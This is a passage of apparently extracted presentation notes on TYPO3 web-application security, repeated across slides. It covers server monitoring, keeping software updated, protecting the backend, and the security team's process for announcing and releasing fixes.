  51. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  52. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  53. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  54. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  55. TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  56. TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  57. TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  58. TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  59. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  60. RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  61. RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  62. RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  63. RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  64. \n
  65. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  66. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  67. \n